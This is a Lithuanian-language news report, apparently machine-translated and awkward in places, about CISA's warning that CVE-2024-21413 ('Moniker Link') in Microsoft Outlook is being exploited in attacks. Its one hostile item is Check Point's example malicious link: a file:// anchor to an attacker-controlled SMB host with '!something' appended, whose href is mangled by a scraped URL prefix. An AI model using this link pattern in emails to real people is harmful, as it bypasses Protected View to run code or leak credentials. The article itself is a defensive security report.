CISA ketvirtadienį perspėjo JAV federalines agentūras užtikrinti savo sistemas nuo vykstančių išpuolių, nukreiptų į kritinę „Microsoft Outlook“ nuotolinio kodo vykdymo (RCE) pažeidžiamumą.
Atrodo „Check Point“ pažeidžiamumo tyrėjas Haifei Li ir stebimas kaip CVE-2024-21413, trūkumą sukelia netinkamas įvesties patvirtinimas, kai atidaroma el. Laiškai su kenksmingomis nuorodomis, naudojant pažeidžiamas „Outlook“ versijas.
Užpuoliai įgyja nuotolinio kodo vykdymo galimybes, nes trūkumas leidžia jiems apeiti saugomą vaizdą (kuris turėtų blokuoti kenksmingą turinį, įterptą į biuro failus, atidarant juos tik skaitymo režimu) ir atidarykite kenksmingus biuro failus redagavimo režimu.
Kai prieš metus jis pataisė CVE-2024-21413, „Microsoft“ taip pat perspėjo, kad peržiūros sritis yra atakos vektorius, leidžiantis sėkmingai išnaudoti net peržiūrint piktybiškai parengtus biuro dokumentus.
Kaip paaiškino „Check Point“, šis saugumo trūkumas (dubliuotas „Moniker Link“) leidžia grėsmės veikėjams apeiti integruotas „Outlook“ apsaugos priemones, skirtas kenkėjiškoms nuorodoms, įterptoms į el. Laiškus, naudojant failą: // protokolą ir pridedant šauktuką prie URL, nurodančių užpuoliko kontroliuojamus serverius.
Šauktukas pridedamas iškart po failo plėtinio kartu su atsitiktiniu tekstu (jų pavyzdyje, patikrinkite, ar naudojamas „kažkas“), kaip parodyta žemiau:
*<a href="https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-microsoft-outlook-now-exploited-in-attacks/file:///\10.10.111.111\test\test.rtf!something">CLICK ME</a>*CVE-2024-21413 daro įtaką keliems biuro produktams, įskaitant „Microsoft Office LTSC 2021“, „Microsoft 365“ programos, skirtos įmonėms, „Microsoft Outlook 2016“ ir „Microsoft Office 2019“ bei sėkmingi CVE-2024-21413 atakos savavališko kodekso per piktybiškai parengtus biuro dokumentus.
Ketvirtadienį CISA pridėjo pažeidžiamumą prie savo žinomo išnaudotų pažeidžiamumų (KEV) katalogo, pažymėdama jį kaip aktyviai išnaudojamą. Kaip įpareigojama įpareigojančios operatyvinės direktyvos (BOD) 22-01, federalinės agentūros savo tinklus turi užtikrinti per tris savaites iki vasario 27 d.
„Šios pažeidžiamumo rūšys yra dažni kenksmingų kibernetinių veikėjų atakų vektoriai ir kelia didelę riziką federalinei įmonei“, – perspėjo kibernetinio saugumo agentūra.
Nors CISA daugiausia dėmesio skiria federalinių agentūrų įspėjimui apie pažeidžiamumus, kurie turėtų būti kuo greičiau pataisyti, privačioms organizacijoms taip pat patariama prioritetuoti šiuos trūkumus, kad būtų užkirstas kelias vykstančioms atakoms.
